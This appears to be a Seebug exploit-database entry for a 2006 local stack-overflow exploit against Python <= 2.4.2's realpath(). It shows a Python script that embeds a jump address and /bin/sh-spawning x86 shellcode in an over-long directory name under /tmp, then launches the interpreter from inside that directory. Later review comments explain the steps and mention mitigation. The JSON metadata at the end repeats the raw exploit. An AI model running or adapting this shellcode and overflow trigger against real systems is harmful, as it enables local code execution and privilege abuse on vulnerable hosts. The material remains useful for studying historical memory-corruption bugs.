ID SSV:63424
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/python
# gexp-python.py
#
# Python <= 2.4.2 realpath() Local Stack Overflow
# -----------------------------------------------
# Against VA Space Randomization.
#
# Copyright (c) 2006 Gotfault Security
#
# Bug found and developed by: dx/vaxen (Gotfault Security),
# posidron (Tripbit Research Group).
# Environment:
#
# Kernel Version : 2.6.12.5-vs2.0
# GCC Version : 4.0.3
# Libc Version : 2.3.5
#
# Special greets goes to : posidron from tripbit.net
# RFDSLabs, barros, izik,
# Gotfault Security Community.
#
# Original Reference:
# http://gotfault.net/research/exploit/gexp-python.py
import os
# NOTE(review): proof-of-concept for the realpath() stack overflow named in the
# header (Python <= 2.4.2). The only attacker-controlled input is the current
# working directory: the script builds an over-long nested path under /tmp and
# starts the interpreter from inside it. Where exactly the interpreter copies
# the path into a fixed-size stack buffer is not shown here -- confirm against
# the upstream fix. Local issue: any injected code runs with the privileges of
# whoever launches `python`, so the practical risk is an interpreter started
# from a more privileged context in an untrusted directory.
# Mitigation: run a release newer than the affected range in the header, and
# keep non-executable stack / full ASLR enabled.
# Detection: very long path components under world-writable directories that
# contain non-printable bytes.

# JMP *%ESP @ linux-gate.so.1
# Four-byte return-address overwrite (0xffffe75f when read little-endian).
# Per the header ("Against VA Space Randomization") it was picked because that
# mapping sat at a fixed address on the listed kernel; it is specific to the
# kernel/libc/GCC combination in the header and is not expected to be valid
# elsewhere -- TODO confirm.
jmp = "\x5f\xe7\xff\xff"
# 40 bytes of x86 Linux machine code embedded in a directory name. The trailing
# bytes spell "/bin/sh" and the code issues `int 0x80` (\xcd\x80), i.e. it
# spawns a local shell. Python 2 byte-string semantics are assumed; under
# Python 3 these literals would be text, not raw bytes.
shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e"
shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
# Work under /tmp and remember the resolved starting directory for cleanup.
os.chdir("/tmp")
base = os.getcwd()
# Relative path of five filler components (4 x 250 + 42 "A" bytes) followed by
# one component holding the address and the machine code above.
# NOTE(review): `dir` shadows the builtin of the same name.
dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell)
os.makedirs(dir)
os.chdir(dir)
# The shell redirection creates an empty vuln.py, then whichever `python` is
# first on PATH is run on it from inside the long directory. The script body is
# irrelevant; presumably the overflow is reached while the interpreter resolves
# its script path at startup -- confirm.
os.system('> vuln.py; python vuln.py')
# Cleanup: delete the empty script, return to /tmp, and remove the nested
# directories from the leaf upwards (`dir` is relative to `base`).
os.remove("vuln.py")
os.chdir(base)
os.removedirs(dir)
# milw0rm.com [2006-03-18]
{"lastseen": "2017-11-19T16:29:08", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T16:29:08", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:29:08", "rev": 2}, "vulnersScore": 0.0}, "href": "https://www.seebug.org/vuldb/ssvid-63424", "references": [], "enchantments_done": [], "id": "SSV:63424", "title": "Python <= 2.4.2 realpath() Local Stack Overflow Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n #!/usr/bin/python\r\n \r\n# gexp-python.py\r\n# \r\n# Python <= 2.4.2 realpath() Local Stack Overflow\r\n# -----------------------------------------------\r\n# Against VA Space Randomization.\r\n#\r\n# Copyright (c) 2006 Gotfault Security\r\n#\r\n# Bug found and developed by: dx/vaxen (Gotfault Security),\r\n#\t\t\t posidron (Tripbit Research Group).\r\n# Enviroment:\r\n#\r\n# Kernel Version\t : 2.6.12.5-vs2.0\r\n# GCC Version\t\t : 4.0.3\r\n# Libc Version\t\t : 2.3.5\r\n#\r\n# Special greets goes to : posidron from tripbit.net\r\n#\t\t\t RFDSLabs, barros, izik,\r\n#\t\t\t Gotfault Security Community.\r\n#\r\n# Original Reference:\r\n# http://gotfault.net/research/exploit/gexp-python.py\r\n\r\nimport os\r\n\r\n# JMP *%ESP @ linux-gate.so.1\r\njmp = "\\x5f\\xe7\\xff\\xff"\r\n\r\nshell = "\\xeb\\x1a\\x5e\\x31\\xc0\\x88\\x46\\x07\\x8d\\x1e"\r\nshell += "\\x89\\x5e\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3"\r\nshell += "\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\xe8\\xe1"\r\nshell += "\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"\r\n\r\nos.chdir("/tmp")\r\nbase = os.getcwd()\r\ndir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell)\r\nos.makedirs(dir)\r\nos.chdir(dir)\r\n\r\nos.system('> vuln.py; python 
vuln.py')\r\nos.remove("vuln.py")\r\nos.chdir(base)\r\nos.removedirs(dir)\r\n\r\n# milw0rm.com [2006-03-18]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63424", "type": "seebug", "immutableFields": []}
{}